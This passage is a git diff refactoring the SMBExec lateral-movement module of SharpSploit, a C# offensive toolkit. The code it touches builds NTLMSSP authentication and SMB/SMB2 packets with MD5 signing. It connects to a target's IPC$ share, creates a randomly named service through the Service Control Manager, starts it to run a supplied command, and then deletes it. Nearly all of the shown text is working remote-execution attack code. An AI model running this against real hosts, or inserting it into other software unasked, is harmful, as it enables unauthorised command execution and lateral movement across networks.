-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_offset);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, SMB_session_key_length);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, SMB_session_key_length);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, SMB_session_key_offset);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, SMB_negotiate_flags);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_bytes);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_bytes);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_bytes);
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
-                NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response);
 
-
+                byte[] NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 })
+                        .Concat(auth_LM_offset)
+                        .Concat(NTLMv2_response_length)
+                        .Concat(NTLMv2_response_length)
+                        .Concat(auth_NTLM_offset)
+                        .Concat(auth_domain_length)
+                        .Concat(auth_domain_length)
+                        .Concat(auth_domain_offset)
+                        .Concat(auth_username_length)
+                        .Concat(auth_username_length)
+                        .Concat(auth_username_offset)
+                        .Concat(auth_hostname_length)
+                        .Concat(auth_hostname_length)
+                        .Concat(auth_hostname_offset)
+                        .Concat(SMB_session_key_length)
+                        .Concat(SMB_session_key_length)
+                        .Concat(SMB_session_key_offset)
+                        .Concat(SMB_negotiate_flags)
+                        .Concat(auth_domain_bytes)
+                        .Concat(auth_username_bytes)
+                        .Concat(auth_hostname_bytes)
+                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                        .Concat(NTLMv2_response).ToArray();
                 if (ForceSMB1)
                 {
                     packet_SMB_header = new OrderedDictionary();
@@ -1324,9 +1347,7 @@ namespace SharpSploit.LateralMovement
                     byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
                     OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
                     byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                    SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                    SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
-
+                    SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
                 }
                 else
                 {
@@ -1339,8 +1360,7 @@ namespace SharpSploit.LateralMovement
                     byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
                     OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
                     byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                    SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                    SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                    SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
                 }
 
 
@@ -1382,7 +1402,7 @@ namespace SharpSploit.LateralMovement
                     string SMB_Path = "\\\\" + target + "\\IPC$";
                     if (ForceSMB1)
                     {
-                        SMB_path_bytes = Utilities.CombineByteArray(Encoding.UTF8.GetBytes(SMB_Path), new byte[] { 0x00 });
+                        SMB_path_bytes = Encoding.UTF8.GetBytes(SMB_Path).Concat(new byte[] { 0x00 }).ToArray();
                     }
                     else
                     {
@@ -1397,8 +1417,7 @@ namespace SharpSploit.LateralMovement
                         const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
                         var rand = new Random();
                         SMB_service = new string(Enumerable.Repeat(chars, 20).Select(s => s[rand.Next(s.Length)]).ToArray());
-                        SMB_service_bytes = Encoding.Unicode.GetBytes(SMB_service);
-                        SMB_service_bytes = Utilities.CombineByteArray(SMB_service_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                        SMB_service_bytes = Encoding.Unicode.GetBytes(SMB_service).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                     }
                     else
                     {
@@ -1406,11 +1425,11 @@ namespace SharpSploit.LateralMovement
                         SMB_service_bytes = Encoding.Unicode.GetBytes(SMB_service);
                         if (Convert.ToBoolean(SMB_service.Length % 2))
                         {
-                            SMB_service_bytes = Utilities.CombineByteArray(SMB_service_bytes, new byte[] { 0x00, 0x00 });
+                            SMB_service_bytes = SMB_service_bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
                         }
                         else
                         {
-                            SMB_service_bytes = Utilities.CombineByteArray(SMB_service_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                            SMB_service_bytes = SMB_service_bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                         }
                     }
                     if (debug) { output.AppendLine(String.Format("Service Name is {0}", SMB_service)); }
@@ -1435,11 +1454,11 @@ namespace SharpSploit.LateralMovement
 
                     if (Convert.ToBoolean(command.Length % 2))
                     {
-                        SMBExec_command = Utilities.CombineByteArray(SMBExec_command_init, new byte[] { 0x00, 0x00 });
+                        SMBExec_command = SMBExec_command_init.Concat(new byte[] { 0x00, 0x00 }).ToArray();
                     }
                     else
                     {
-                        SMBExec_command = Utilities.CombineByteArray(SMBExec_command_init, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                        SMBExec_command = SMBExec_command_init.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                     }
                     byte[] SMBExec_command_length_bytes = BitConverter.GetBytes(SMBExec_command.Length / 2);
                     int SMB_split_index = 4256;
@@ -1462,7 +1481,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter = 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
                                         byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
@@ -1474,15 +1493,14 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            byte[] SMB_Sign2 = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign2);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             byte[] SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature2;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_Session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+
+                                        SMB_client_send = NetBIOS_Session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "CreateAndXRequest";
                                     }
@@ -1496,7 +1514,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
                                         byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
@@ -1508,15 +1526,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            byte[] SMB_Sign2 = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign2);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             byte[] SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature2;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_Session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = NetBIOS_Session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "RPCBind";
 
@@ -1530,7 +1546,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
                                         byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
@@ -1544,17 +1560,15 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
+
                                             byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "ReadAndXRequest";
                                         SMB_client_stage_next = "OpenSCManagerW";
@@ -1568,7 +1582,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
                                         byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
@@ -1580,15 +1594,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            byte[] SMB_Sign2 = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign2);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             byte[] SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature2;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = SMB_client_stage_next;
                                     }
@@ -1601,7 +1613,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
 
@@ -1618,20 +1630,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SCM_data);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                             byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_Session_Service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
-
+                                        SMB_client_send = NetBIOS_Session_Service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "ReadAndXRequest";
                                         SMB_client_stage_next = "CheckAccess";
@@ -1690,7 +1695,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
 
@@ -1707,19 +1712,14 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SCM_data);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
+
                                             byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "ReadAndXRequest";
                                         SMB_client_stage_next = "StartServiceW";
@@ -1733,7 +1733,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
                                         byte[] SCM_data_first = Utilities.GetByteRange(SCM_data, 0, SMB_split_index - 1);
@@ -1750,17 +1750,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
                                             byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         if (SMB_split_stage_final <= 2)
                                         {
@@ -1781,7 +1777,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
                                         byte[] SCM_data_middle = Utilities.GetByteRange(SCM_data, SMB_split_index_tracker, SMB_split_index_tracker + SMB_split_index - 1);
@@ -1798,17 +1794,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
                                             byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         if (SMB_split_stage >= SMB_split_stage_final)
                                         {
@@ -1829,7 +1821,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
                                         byte[] SCM_data_last = Utilities.GetByteRange(SCM_data, SMB_split_index_tracker, SCM_data.Length);
@@ -1845,17 +1837,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
                                             byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "ReadAndXRequest";
                                         SMB_client_stage_next = "StartServiceW";
@@ -1872,7 +1860,7 @@ namespace SharpSploit.LateralMovement
                                             {
                                                 packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                                 SMB_signing_counter += 2;
-                                                byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                                byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                 packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                             }
                                             OrderedDictionary packet_SCM_data = SMBExec.SCMStartServiceW(SMB_service_context_handle);
@@ -1888,19 +1876,14 @@ namespace SharpSploit.LateralMovement
                                             if (SMB_signing)
                                             {
                                                 MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                                byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                                SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                                SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
-                                                SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SCM_data);
+                                                byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
+
                                                 byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                                 SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                                 packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                                 SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                             }
-                                            SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
-                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
-                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                            SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                             SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                             SMBClientStage = "ReadAndXRequest";
                                             SMB_client_stage_next = "DeleteServiceW";
@@ -1934,7 +1917,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
 
@@ -1951,19 +1934,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SCM_data);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                             byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "ReadAndXRequest";
                                         SMB_client_stage_next = "CloseServiceHandle";
@@ -1991,7 +1968,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
